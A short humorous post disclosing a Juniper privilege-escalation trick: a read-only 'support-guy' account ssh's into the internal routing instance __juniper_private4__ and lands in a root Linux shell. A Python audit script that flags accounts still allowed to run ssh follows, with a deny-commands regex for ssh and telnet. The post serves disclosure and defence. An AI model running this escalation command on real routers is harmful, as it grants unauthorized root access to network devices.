yo dawg, i heard u like principle of least privilege
root@some-juniper-box.foo.bar> show configuration system login class read-only-with-network
permissions [ network view ];
root@some-juniper-box.foo.bar> show configuration system login user support-guy class
class read-only-with-network;
* few minutes later *
support-guy@some-juniper-box.foo.bar> ssh routing-instance __juniper_private4__ root@192.168.1.1
root@localhost:~# uname -sr
Linux 4.1.27-rt30-WR8.0.0.25_ovp
A “Support” tech with limited privileges can elevate to a root shell just by ssh’ing to the same box.
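A defender-side check for the condition shown above, as an added example that is not part of the original post: it lists accounts whose login class still allows the `ssh` CLI command. The function names, the `deny-commands` regex and the sample config are assumptions of this example, and Python's `re` only approximates how Junos matches `deny-commands`.

```python
import re
import shlex

# Command from the session on this page, used as the probe for deny-commands.
PROBE = "ssh routing-instance __juniper_private4__ root@192.168.1.1"
# Permission sets of the predefined Junos login classes.
BUILTIN = {"super-user": {"all"}, "read-only": {"view"}, "unauthorized": set(),
           "operator": {"clear", "network", "reset", "trace", "view"}}
# Constructed sample (display set form); only the first class/user mirror the page.
SAMPLE = '''\
set system login class read-only-with-network permissions network
set system login class read-only-with-network permissions view
set system login class read-only-no-ssh permissions [ network view ]
set system login class read-only-no-ssh deny-commands "^(ssh|telnet) .*"
set system login user support-guy class read-only-with-network
set system login user noc-guy class read-only-no-ssh
set system login user auditor class read-only
set system login user ops class operator
'''

def parse_login(config):
    """Return ({class: {"permissions", "deny"}}, {user: class})."""
    classes = {n: {"permissions": set(p), "deny": []} for n, p in BUILTIN.items()}
    users = {}
    for line in config.splitlines():
        tok = shlex.split(line)
        if len(tok) < 7 or tok[:3] != ["set", "system", "login"]:
            continue
        kind, name, key, values = tok[3], tok[4], tok[5], tok[6:]
        if kind == "class":
            cls = classes.setdefault(name, {"permissions": set(), "deny": []})
            if key == "permissions":
                cls["permissions"].update(v for v in values if v not in ("[", "]"))
            elif key == "deny-commands":
                cls["deny"].extend(values)
        elif kind == "user" and key == "class":
            users[name] = values[0]
    return classes, users

def can_ssh(cls):
    """True if the class grants 'network' or 'all' and no deny regex hits PROBE."""
    granted = bool(cls["permissions"] & {"network", "all"})
    # Assumption: Python's re stands in for the Junos regex matcher.
    return granted and not any(re.search(rx, PROBE) for rx in cls["deny"])

def audit(config):
    """Sorted users whose login class lets them run ssh from the CLI."""
    classes, users = parse_login(config)
    return sorted(u for u, c in users.items() if c in classes and can_ssh(classes[c]))
```

Feed `audit()` the output of `show configuration system login | display set`; on the constructed sample it reports `ops` and `support-guy`.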